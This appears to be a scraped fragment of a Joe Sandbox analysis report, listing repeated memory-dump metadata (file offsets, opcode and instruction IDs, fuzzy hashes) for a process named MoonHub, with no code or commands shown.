                                                                                                                                                                                • Instruction Fuzzy Hash: 6021F322D0C85E6EF7A4B2E888112F972D0FF883A9F440176D81CC34C2DF68A80A0285
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 93c248ef0776a61bffabd177d4220fdbd8c464d8a02d06f70e08e585df206d45
                                                                                                                                                                                • Instruction ID: f49bb2b19511172214d04a51454a969b26f8cfcab0f0d17701f4a752f3065538
                                                                                                                                                                                • Opcode Fuzzy Hash: 93c248ef0776a61bffabd177d4220fdbd8c464d8a02d06f70e08e585df206d45
                                                                                                                                                                                • Instruction Fuzzy Hash: 1021C232D0D9AA0EF7B4B6A448111F976E0FF45398F4801BAD45CC36E3DFB8690B5A85
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5c57733f8be81eda90a77af892aa24087a3b9dbbc9467a13b05f8e0d7bd50907
                                                                                                                                                                                • Instruction ID: 7c6252dcd4d106b09972c02d8bb916dc693b9c112039ccf0fd4cae7f86dd3ea3
                                                                                                                                                                                • Opcode Fuzzy Hash: 5c57733f8be81eda90a77af892aa24087a3b9dbbc9467a13b05f8e0d7bd50907
                                                                                                                                                                                • Instruction Fuzzy Hash: 9821F636D0CA8E9EF7A4B6384C111F976E0FF86790F4401B6D45CC70E2EF38A9094689
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 6036da5dd30791729061cae3945ec7fa8434bc34b5448f476d2bc23681e0eecd
                                                                                                                                                                                • Instruction ID: 2ae0c7c93a96fba0c3ff0eeb20e3c0a3d5620d9776369940f6808a83b9bd66b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 6036da5dd30791729061cae3945ec7fa8434bc34b5448f476d2bc23681e0eecd
                                                                                                                                                                                • Instruction Fuzzy Hash: AD21D131D0CA9A8FF7A5B22CC8152F9BBE1FF85790F4801BAD45CC7482DF38680A4685
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 7d40e51843d1f5666bf4dad9aad42be9194cebd99dd3311f292c9409d4352a61
                                                                                                                                                                                • Instruction ID: 8d153ddc3076e193409e1dddd246c67e1842e9da003e73797a60fea98f098462
                                                                                                                                                                                • Opcode Fuzzy Hash: 7d40e51843d1f5666bf4dad9aad42be9194cebd99dd3311f292c9409d4352a61
                                                                                                                                                                                • Instruction Fuzzy Hash: EC210536E1CB9A4EF7B5F22848152B976E0FF45790F4841BAD45CE3487DF38280A4685
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 057793698eb884c9ae85d137500439c167f963aeede6cc319b0d70aa188344e6
                                                                                                                                                                                • Instruction ID: c875951ec76cf8d1e81dfadbda47e69c66b1727e13bcd5589b3352f9c884dc35
                                                                                                                                                                                • Opcode Fuzzy Hash: 057793698eb884c9ae85d137500439c167f963aeede6cc319b0d70aa188344e6
                                                                                                                                                                                • Instruction Fuzzy Hash: 5B21A122D0CA9A4EF774F6645C212F976E0FF45B90F4401B6D49CC35C3EF3A68094685
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ac193ed47e6da0c39e12ffa5190dcfe70391d1cbeb2ea2a4460d4a463af73a26
                                                                                                                                                                                • Instruction ID: 4457af3fbe7ac82385ef3c0cad9230612a6cac20a5768b718db5e476bd8ab399
                                                                                                                                                                                • Opcode Fuzzy Hash: ac193ed47e6da0c39e12ffa5190dcfe70391d1cbeb2ea2a4460d4a463af73a26
                                                                                                                                                                                • Instruction Fuzzy Hash: 71112331E1CE490EE79AB66C104953A26C1EFE8B90F08463BE41DD3297DF349842429A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5e00edc2cc73ad4a858b538c8141b61427456060bdc9eefe2678d2c476f524ca
                                                                                                                                                                                • Instruction ID: 9106bbbe40ca4c20f0d262eef443b3940edc7e57cb156edc6aa2d45e6a269b16
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e00edc2cc73ad4a858b538c8141b61427456060bdc9eefe2678d2c476f524ca
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B21D63194E6895FC7429BB48C556ED7FF4EF4B250B0541E7E088C71A3CA2C594ACBA1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e03b26cefecf5c4dbbe3d7b08ea0b86856e41d038785b85453aa99602b024afd
                                                                                                                                                                                • Instruction ID: 330b682dc88b9f97f73d17a664908fb64af1b447c137ca5b8433bb41cd729184
                                                                                                                                                                                • Opcode Fuzzy Hash: e03b26cefecf5c4dbbe3d7b08ea0b86856e41d038785b85453aa99602b024afd
                                                                                                                                                                                • Instruction Fuzzy Hash: 36218B7290CB815FE30AF72CA8A50F57BE0FF95355F0842B7D088CB1A3EA2845148399
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 16ccbd445d8e7517c26563d9a53d0e6601af764e65d96679f58bc0e9968e9651
                                                                                                                                                                                • Instruction ID: 460348370a41b2cc1615f4d181bc0bfecec5cb6ee43a0fc0c86f7785f3a873b5
                                                                                                                                                                                • Opcode Fuzzy Hash: 16ccbd445d8e7517c26563d9a53d0e6601af764e65d96679f58bc0e9968e9651
                                                                                                                                                                                • Instruction Fuzzy Hash: 4521C331E1D94A9FEB80FBA888156BA7BE1FF18694F4400FAD40ED7192EF7868058345
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 534a79ad190b633772f85f7b5232ab802b149f1e6755ab98b914b3d215fe3dcd
                                                                                                                                                                                • Instruction ID: 06ef604c94b5021899a08e250c7a8002e4b6cf7b6fe5bb7054329f3b2118836a
                                                                                                                                                                                • Opcode Fuzzy Hash: 534a79ad190b633772f85f7b5232ab802b149f1e6755ab98b914b3d215fe3dcd
                                                                                                                                                                                • Instruction Fuzzy Hash: 7E11B234A0894ECFDB88EF58C894AAA73F2FF68304F145165D419C7259CB74ED52CB44
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 678e22442c6085638cd3b72083ffc0a6042b382b10e4cee3833a5d3ba4d2f242
                                                                                                                                                                                • Instruction ID: d4d75b72cd667d1778db72042189abefd44c1886ba3410862fa8b71803bc5889
                                                                                                                                                                                • Opcode Fuzzy Hash: 678e22442c6085638cd3b72083ffc0a6042b382b10e4cee3833a5d3ba4d2f242
                                                                                                                                                                                • Instruction Fuzzy Hash: 3B113A3190CB854FD30AF72868A50B57BE4FF95795F0842BBD059CB1F3EA2845548399
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f84feaf258da16ce644c36a6e818e41938ef61f95f16ec9510eac6b2afe6945e
                                                                                                                                                                                • Instruction ID: 0977d247349494bb21aeb6652a95e68c052dbb3d0c317ea403dda45770335aed
                                                                                                                                                                                • Opcode Fuzzy Hash: f84feaf258da16ce644c36a6e818e41938ef61f95f16ec9510eac6b2afe6945e
                                                                                                                                                                                • Instruction Fuzzy Hash: 9901D622E2CD551FE76CB52D68494B673D1FBA9361B10017FE40FC3587EE25AC468289
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ae00292fb63c2b5f81f982290564e97a0b1161f596146465d6cafb85d29bd5b3
                                                                                                                                                                                • Instruction ID: 686cd60247d7690f4da9fe6f2ba9f4700e0be6d6f2c876789273d92886973411
                                                                                                                                                                                • Opcode Fuzzy Hash: ae00292fb63c2b5f81f982290564e97a0b1161f596146465d6cafb85d29bd5b3
                                                                                                                                                                                • Instruction Fuzzy Hash: 28117030E1CE0A8FEBA9A63C4856676B2D1FB5A340F24447CD04FC2184DF39E8428744
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fa648fee3c990bd74652ce8749fbcd2f9494362f6f6353ead13659334d27698b
                                                                                                                                                                                • Instruction ID: 6997cb35b36f0a3dd4f0bc8e3a7eb126e520cd7c9d078a6e3e662a4baeadc315
                                                                                                                                                                                • Opcode Fuzzy Hash: fa648fee3c990bd74652ce8749fbcd2f9494362f6f6353ead13659334d27698b
                                                                                                                                                                                • Instruction Fuzzy Hash: 56114C30608A499FDB81EB688455BEA73E2FF58354F5840B9D44DCB256DA78EC818B40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 85cc8000a2a2a4402b8fabd1768f51808483155b6b1ff56a54769b87685d758d
                                                                                                                                                                                • Instruction ID: 6ea01efc4a928933dbc9509acc75affdd9412ca1d80dcd2bc70a0953903135c1
                                                                                                                                                                                • Opcode Fuzzy Hash: 85cc8000a2a2a4402b8fabd1768f51808483155b6b1ff56a54769b87685d758d
                                                                                                                                                                                • Instruction Fuzzy Hash: 95112E30609A499FDB81EF688454BEA77E2FF58350F1844B9E44DCB297DA38DC518B40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 327c68fec26453bd04a2cb064ee01a9204ae08e8d9e8f97d3f81310f6a9897ea
                                                                                                                                                                                • Instruction ID: 02591fe8a875f5d2583392ac527cc4744b0c927580094ceafa984346c0826202
                                                                                                                                                                                • Opcode Fuzzy Hash: 327c68fec26453bd04a2cb064ee01a9204ae08e8d9e8f97d3f81310f6a9897ea
                                                                                                                                                                                • Instruction Fuzzy Hash: 5401D82051E98A0FD30AB73C5C155A57BE0FF87250F4945F6E448C719BDB2C9886C395
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03b97f5edc5c771577b316edbd3c34de6e066ec66158d713fcad1f0e4e58dd14
                                                                                                                                                                                • Instruction ID: fe5945d7e4857c8c8da57fbae002f26febd8b661cd738724cfc88faa187c2f96
                                                                                                                                                                                • Opcode Fuzzy Hash: 03b97f5edc5c771577b316edbd3c34de6e066ec66158d713fcad1f0e4e58dd14
                                                                                                                                                                                • Instruction Fuzzy Hash: 1A01493290E94E4FEB04AA9AAC405EA7BD4FF8837DF04027AE40CC31C0DBB99456C741
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: bd98e9010e110a6c51ba89d952ec0a1ec10ed6df11caafc2d18c6145796ddac0
                                                                                                                                                                                • Instruction ID: 03887a28a214837101a20041fd74602eaf2cf7c7ca019547b78d4e24e9143912
                                                                                                                                                                                • Opcode Fuzzy Hash: bd98e9010e110a6c51ba89d952ec0a1ec10ed6df11caafc2d18c6145796ddac0
                                                                                                                                                                                • Instruction Fuzzy Hash: F4016530A1850E8FDF88EE55C4506BA73E2FFA8355F149539D40AD3285DA74E8528B40
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 66d21e3ada782e5c045b42936ffc9135e893dd2ff816f01541471c87551905f7
                                                                                                                                                                                • Instruction ID: c6143613c72b98bd73b0e3c7359a9c96ad76639766ed8fbf7275017bd52a9011
                                                                                                                                                                                • Opcode Fuzzy Hash: 66d21e3ada782e5c045b42936ffc9135e893dd2ff816f01541471c87551905f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 1711EC31A1D68A4FDB44FBB8C811BEEBBB0FF45244F4400B9D00AE31A3CE282800C711
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: c0d9d28d845b11be126a73bf5f4a59da7d7c3d9cb839667da7dad7c18e760de8
                                                                                                                                                                                • Instruction ID: 52f71bc30f9f2570764468ed8f39c05ab89f44e5a0f4ae2455d7ff84bd13e378
                                                                                                                                                                                • Opcode Fuzzy Hash: c0d9d28d845b11be126a73bf5f4a59da7d7c3d9cb839667da7dad7c18e760de8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0F01F97290EBD96FE30AA6755C5D4F63F70FE53155B0841ABF088C60A3EA545809C365
Memory Dump Source
• Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                • Instruction ID: 8dbb3128407f4c1da2c0b1adc65877ef80aa8c3574175d0d5bb0d94f3226c17d
                                                                                                                                                                                • Opcode Fuzzy Hash: 5d4445aeca887ccebbc9e889ef231fb51a5b1389b29f0a4a8db57d2c9576cef4
                                                                                                                                                                                • Instruction Fuzzy Hash: 58F0EC6071CD0E8FEA94FA2DC45193573D0FB28348B6445A8D40DCB592EB29E8468714
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 34e7b139b3a91165c036247c023191a20116ddfb28ce7c29714b7fbec754ae14
                                                                                                                                                                                • Instruction ID: e540d726ef73d6884d759f0aa8328a786357fa3a964852aaa4c55f09ce31c346
                                                                                                                                                                                • Opcode Fuzzy Hash: 34e7b139b3a91165c036247c023191a20116ddfb28ce7c29714b7fbec754ae14
                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF0FC3092CB094FE750FB38940467AB6E0FF98345F040A3AA88DD21A0EF38D5804785
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: f5bdc52f301aaf2a5231920df62697cd294f930cc81b0d136ee1cccc69143eed
                                                                                                                                                                                • Instruction ID: a18391090aa88e3a8aaf90c2f600061f9c1a50be57d3bf4e1865de288d028d15
                                                                                                                                                                                • Opcode Fuzzy Hash: f5bdc52f301aaf2a5231920df62697cd294f930cc81b0d136ee1cccc69143eed
                                                                                                                                                                                • Instruction Fuzzy Hash: BEE02B22B1D8161FB258B19D24C55F90785FFEC271F080177E41CC2182CE685883435C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 67006302b1450b69ad6ae54e8821a4e4772c459dc7f03109616f4ae413c88b67
                                                                                                                                                                                • Instruction ID: b10108c9ec08d0c84efdf3dce8131dab70cd76aef8f246eb9ac2569f7133487f
                                                                                                                                                                                • Opcode Fuzzy Hash: 67006302b1450b69ad6ae54e8821a4e4772c459dc7f03109616f4ae413c88b67
                                                                                                                                                                                • Instruction Fuzzy Hash: D1F0827180EBD86FE35AEB364C5E4A63F74EE53254B09109BF088CB0A3E6645808C361
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a99dc3a3344534d12e2d8d9575cc188ed1bacee1fbf09c19fef39bd08d201bc0
                                                                                                                                                                                • Instruction ID: f3662492b2e02bbe18ba715eafe4414908c9cd992de83dd09a6977e9b4c1f6ce
                                                                                                                                                                                • Opcode Fuzzy Hash: a99dc3a3344534d12e2d8d9575cc188ed1bacee1fbf09c19fef39bd08d201bc0
                                                                                                                                                                                • Instruction Fuzzy Hash: FEF08967E1CAD15FD7B5553C54650B52BD1FFDA9A071401FBC08A87196EE1818064245
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: b44cd39818f04e619791f773b127726b32a9dab81aaecfd4790ff1e64e29ace8
                                                                                                                                                                                • Instruction ID: 95d6cceb580f86f20e35931f824c02beb0c7fdc100d01e2f0cefa0ac78a5b6bc
                                                                                                                                                                                • Opcode Fuzzy Hash: b44cd39818f04e619791f773b127726b32a9dab81aaecfd4790ff1e64e29ace8
                                                                                                                                                                                • Instruction Fuzzy Hash: DFF0E201C9CE660EF7B6717A31483BA29C1BB14364F4824BAD89DC49C1EA5CFCC583AD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: cbc193fd4d52a90eb9f61d3bb50143d020919b434574490080ac0734bf327db4
                                                                                                                                                                                • Instruction ID: e5e26c118fd2858c13dd80129af8e3a7523403bf24858c06a0b980e97f883f40
                                                                                                                                                                                • Opcode Fuzzy Hash: cbc193fd4d52a90eb9f61d3bb50143d020919b434574490080ac0734bf327db4
                                                                                                                                                                                • Instruction Fuzzy Hash: 06E09B31D0D8175ED6A8763864891F812D1FF85390F940576D44DC61D6CF296C898699
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: e5b2d3d50e59f933a9fa7de3ddd1b468536fe3a99278d187a9876ad99df22c07
                                                                                                                                                                                • Instruction ID: 77d25375b07637f6965b276367ac7fc1e63d34a2bebcef177142aad29e47f8e2
                                                                                                                                                                                • Opcode Fuzzy Hash: e5b2d3d50e59f933a9fa7de3ddd1b468536fe3a99278d187a9876ad99df22c07
                                                                                                                                                                                • Instruction Fuzzy Hash: E2F0152294DBCC4EDB63BBB418211E83F71AE02249F4A00E3D588DB0A3E7281909C366
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.2991090703.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ff848e90000_MoonHub.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 12d2e3c7c47e775806c4be3e14d5848d5c55912e3e3ce03bf9e20325ec0c5a81
                                                                                                                                                                                • Instruction ID: 0e2b5842efc4bbcdd0cf3cfe3cd07c2eec3b0edfbf8d3e24cfe67d39306e1f97
                                                                                                                                                                                • Opcode Fuzzy Hash: 12d2e3c7c47e775806c4be3e14d5848d5c55912e3e3ce03bf9e20325ec0c5a81
                                                                                                                                                                                • Instruction Fuzzy Hash: 3BE06831D4CB4C4FDB50BA68B8009D83BA0FB843A8F0400A9E00DC3280C7799C54C342
                                                                                                                                                                                Memory Dump Source
